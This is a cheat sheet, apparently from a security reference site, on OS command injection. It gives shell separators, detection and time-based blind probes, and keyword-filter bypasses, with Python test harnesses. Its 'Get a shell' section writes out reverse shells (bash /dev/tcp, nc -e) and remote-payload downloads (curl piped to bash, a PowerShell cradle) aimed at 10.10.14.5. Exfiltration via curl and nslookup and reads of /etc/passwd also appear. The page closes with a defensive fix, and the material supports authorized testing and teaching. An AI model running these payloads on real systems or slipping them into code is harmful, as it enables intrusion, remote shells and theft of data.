CyberCheatsheets

Command Injection Cheat Sheet

OS command injection payloads, separators, blind detection, and filter bypasses for achieving RCE on authorized targets.

Web Application Security · command-injection · injection · owasp · rce · web · Updated 2026-06-17

Overview

Command injection happens when user input is concatenated into a command string that is handed to an OS shell (system(), popen(), subprocess with shell=True, exec via sh -c) without sanitization, so shell metacharacters in the input terminate the intended command and let you append or chain your own. Look for features that touch the system: ping/traceroute tools, file converters, backup utilities, and anything that shells out. If the command's output is not reflected in the response, confirm blindly with time delays or out-of-band callbacks.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Separators (chain your command)

Run after the original command (Unix)

; id

Pipe: your command runs regardless of the first command's exit status and receives its stdout on stdin

| id

Run only if the first command succeeds (exit status 0)

&& id

Run only if the first command fails (non-zero exit); useless when the original command always succeeds

|| id

Newline, URL-encoded as %0a: the shell treats it as a command terminator, so it works where ; is filtered

%0a id

Command substitution (inline output): the output of id is spliced into the original command line; this also works inside a double-quoted argument, where ; alone would not break out

`id`   $(id)

Detect injection

Append to a ping field and look for command output

127.0.0.1; id

Confirm with a second command

127.0.0.1 && whoami

Substitution echoes a marker if injectable; pick a token that normal output could not contain

$(echo vulnerable)

Blind detection

Time-based: the response is delayed ~5s if injectable; repeat with a different value (sleep 10) to rule out network latency

127.0.0.1; sleep 5

OOB: watch your host for ICMP (tcpdump -i any icmp); the trailing & backgrounds ping so the request returns

127.0.0.1 & ping -c 5 10.10.14.5 &

Exfiltrate output via DNS (whoami in the subdomain); needs only DNS egress, which is often allowed when HTTP is not; point it at your Interactsh or Collaborator domain

; nslookup `whoami`.oast.fun

OOB exfil over HTTP, base64-encoded; note that base64 output can contain / and + and wraps at 76 columns, so use base64 -w0 (GNU) and expect the path to be split at any /, or send it as a query string

; curl http://10.10.14.5/$(id|base64)
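The separator, marker and time-based payloads above, exercised by a small Python harness. This is an added example and not part of the original cheat sheet. The target function is an assumption about how the vulnerable feature is written (user input formatted into a shell=True command string), with printf standing in for ping so that it runs offline; the host 127.0.0.1 and the arithmetic marker are constructed. The marker uses $((4321*7)) rather than a fixed word so that input merely reflected back ("$((4321*7))") cannot be mistaken for input that was executed ("30247").

```python
import subprocess
import time
from urllib.parse import unquote

# Constructed marker: the shell evaluates the arithmetic, so reflected input
# ("$((4321*7))") is distinguishable from executed output ("30247").
MARK_CMD = "echo $((4321*7))"
MARK_OUT = "30247"


def vulnerable_ping(host: str) -> str:
    """Stand-in for the vulnerable feature (an assumption about the app).

    printf replaces ping so the demo runs offline; the bug is the unquoted
    interpolation of `host` into a string that /bin/sh then interprets.
    """
    cmd = f"printf 'PING %s\\n' {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def probe_separators(target=vulnerable_ping) -> dict:
    """Try each separator from the cheat sheet with the marker command.

    True means the injected command ran and its output was reflected.
    """
    payloads = {
        ";":   f"127.0.0.1; {MARK_CMD}",            # runs after the original
        "|":   f"127.0.0.1 | {MARK_CMD}",           # echo gets printf's stdout and ignores it
        "&&":  f"127.0.0.1 && {MARK_CMD}",          # printf exits 0, so echo runs
        "||":  f"127.0.0.1 || {MARK_CMD}",          # printf exits 0, so echo is skipped
        "%0a": unquote(f"127.0.0.1%0a{MARK_CMD}"),  # URL-decoded newline terminator
        "$()": f"$({MARK_CMD})",                    # substituted into the argument
    }
    return {sep: MARK_OUT in target(p) for sep, p in payloads.items()}


def blind_time_probe(target=vulnerable_ping, delay: float = 2, repeats: int = 2) -> bool:
    """Time-based blind check.

    Compares a control request with the same request plus `; sleep N`, and
    repeats so a single slow control response cannot cause a false positive.
    """
    for _ in range(repeats):
        start = time.monotonic()
        target("127.0.0.1")
        control = time.monotonic() - start

        start = time.monotonic()
        target(f"127.0.0.1; sleep {delay}")
        injected = time.monotonic() - start

        if injected - control < 0.8 * delay:
            return False
    return True


if __name__ == "__main__":
    for sep, hit in probe_separators().items():
        print(f"{sep:>4}: {'injectable' if hit else 'no marker'}")
    print("time-based:", blind_time_probe())
```

Against the stand-in, every separator except || reports a hit, because printf (like most ping wrappers on a valid host) exits 0; that is exactly why the tips advise trying each separator rather than stopping at the first one that fails.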

Filter bypasses

Quotes/backslashes break keyword blocklists

w'h'o'a'mi   wh\oami

Empty expansions inserted inside a keyword (removed by the shell before execution): $@ expands to nothing when no positional parameters are set, and '' is an empty string

who$@ami   c''at /etc/passwd

${IFS} substitutes a space when spaces are blocked

cat${IFS}/etc/passwd

Brace expansion avoids spaces (bash and zsh only; dash, the /bin/sh on Debian and Ubuntu, leaves the braces literal)

{cat,/etc/passwd}

Wildcards to avoid literal binary names; the glob can match more than one file (for example /bin/cut as well as /bin/cat), and every match becomes an argument

/???/c?t /etc/passwd

Base64-encode the whole command to dodge keyword filters; the pipes and base64 -d must themselves survive the filter

echo aWQ= | base64 -d | bash
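Every bypass above exploits the same asymmetry: the filter inspects the raw string, while the shell performs quote removal, parameter expansion, ${IFS} field splitting and globbing before it decides which words form the command. The following Python helper makes that visible; it is an added example, not from the original page. naive_blocklist() is a constructed stand-in for a keyword/space filter, and shell_words() asks /bin/sh (or bash) to print each word of the expanded payload. The glob and brace-expansion cases depend on the shell and filesystem, so they appear only in the demo run.

```python
import base64
import shutil
import subprocess

# Constructed stand-in for a naive keyword/space blocklist.
BLOCKED = ("cat", "whoami", " ", ";")


def naive_blocklist(user_input: str) -> bool:
    """Return True if the filter would reject the raw input string."""
    return any(token in user_input for token in BLOCKED)


def shell_words(payload: str, shell: str = "sh") -> list:
    """Return the words the shell produces from `payload` after expansion.

    `printf '%s\n'` prints each argument on its own line, so quote removal,
    ${IFS} field splitting, $@ expansion and globbing are all observable.
    """
    cmd = f"printf '%s\\n' {payload}"
    out = subprocess.run([shell, "-c", cmd], capture_output=True, text=True).stdout
    return out.splitlines()


def base64_wrap(command: str, shell: str = "sh") -> str:
    """Encode a whole command so that none of its keywords appear in the payload."""
    encoded = base64.b64encode(command.encode()).decode()
    return f"echo {encoded} | base64 -d | {shell}"


if __name__ == "__main__":
    bypasses = [
        "w'h'o'a'mi",
        "wh\\oami",
        "who$@ami",
        "c''at${IFS}/etc/passwd",
        "cat${IFS}/etc/passwd",
        "/???/c?t${IFS}/etc/passwd",   # glob: may also match /bin/cut
    ]
    for p in bypasses:
        print(f"{p:<30} blocked: {naive_blocklist(p)!s:<5} shell sees: {shell_words(p)}")
    if shutil.which("bash"):
        # Brace expansion is bash/zsh only; dash leaves the braces literal.
        print("bash {cat,/etc/passwd} ->", shell_words("{cat,/etc/passwd}", shell="bash"))
        print("sh   {cat,/etc/passwd} ->", shell_words("{cat,/etc/passwd}"))
    print(base64_wrap("id"))
```

Run it on a target system to learn which /bin/sh you are dealing with before relying on brace expansion, and to see how many files a wildcard actually picks up.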

Get a shell

Bash reverse shell (uses bash's /dev/tcp pseudo-device; start a listener first, e.g. nc -lvnp 443)

; bash -c 'bash -i >& /dev/tcp/10.10.14.5/443 0>&1'

Netcat reverse shell (only if the installed nc supports -e: ncat or nc.traditional, not the OpenBSD variant)

; nc 10.10.14.5 443 -e /bin/sh

Pull and run a payload

; curl http://10.10.14.5/s.sh | bash

Windows PowerShell download cradle, injected via cmd.exe (cmd separators are &, &&, || and |; ; is not a separator in cmd)

& powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/p.ps1')"

Tips

  • Try each separator (; | & && ||): apps filter some but not all, and || only fires when the original command fails.
  • No output? Go blind: sleep for timing, or ping/curl/nslookup for out-of-band confirmation.
  • ${IFS}, brace expansion, and wildcards defeat naive space/keyword filters; check which shell is /bin/sh before relying on bash-only expansions.
  • Fix: never build a shell command string from user input. Call the program with an argument vector through a language-native API so no shell parses the input, validate the value against a strict allowlist (IP address or hostname pattern), and reject values starting with - to prevent option injection.
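The fix from the last tip, worked through in Python. This is an added example and not code from the original cheat sheet. The vulnerable pattern it replaces is subprocess.run(f"ping -c 1 {host}", shell=True); the hardened version validates the input against an allowlist and passes it as one element of an argument vector, so separators, quotes, $(...) and ${IFS} either fail validation or reach ping as an inert string. The hostname regex, the function names and the payloads in the test table are constructed for the example.

```python
import ipaddress
import re
import subprocess

# Allowlist for hostnames: RFC 1123-style labels of letters, digits and hyphens,
# no leading or trailing hyphen, at most 63 chars per label and 253 overall.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_host(value: str) -> str:
    """Accept an IPv4/IPv6 address or a hostname; raise ValueError otherwise.

    Every shell metacharacter in the cheat sheet (; | & $ ` ' " { } ? newline)
    is outside the allowed alphabet, so it never reaches the command at all.
    """
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if _HOSTNAME.match(value):
        return value
    raise ValueError(f"invalid host: {value!r}")


def is_rejected(value: str) -> bool:
    """True when validate_host refuses the value (used for the demo table)."""
    try:
        validate_host(value)
    except ValueError:
        return True
    return False


def ping_argv(host: str) -> list:
    """Build the argument vector; no shell ever parses it."""
    host = validate_host(host)
    # Defence in depth against option injection: a leading '-' would be read
    # by ping as a flag even without a shell. The allowlist already rejects
    # it; this keeps the guarantee if the allowlist is ever loosened.
    if host.startswith("-"):
        raise ValueError("host may not start with '-'")
    return ["ping", "-c", "1", host]


def hardened_ping(host: str) -> str:
    """Run ping without a shell. Metacharacters are inert as one argv word."""
    result = subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: the payloads from this cheat sheet plus valid hosts.
    samples = [
        "127.0.0.1", "example.com", "::1",
        "127.0.0.1; id", "127.0.0.1 && whoami", "$(id)",
        "cat${IFS}/etc/passwd", "127.0.0.1\nid", "-I eth0", "",
    ]
    for s in samples:
        print(f"{s!r:<28} -> {'rejected' if is_rejected(s) else ping_argv(s)}")
```

Argument-vector execution removes the shell from the picture, but it does not by itself stop option injection; the allowlist (and the explicit leading-dash check) is what keeps "-I eth0" from being handed to ping as a flag.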
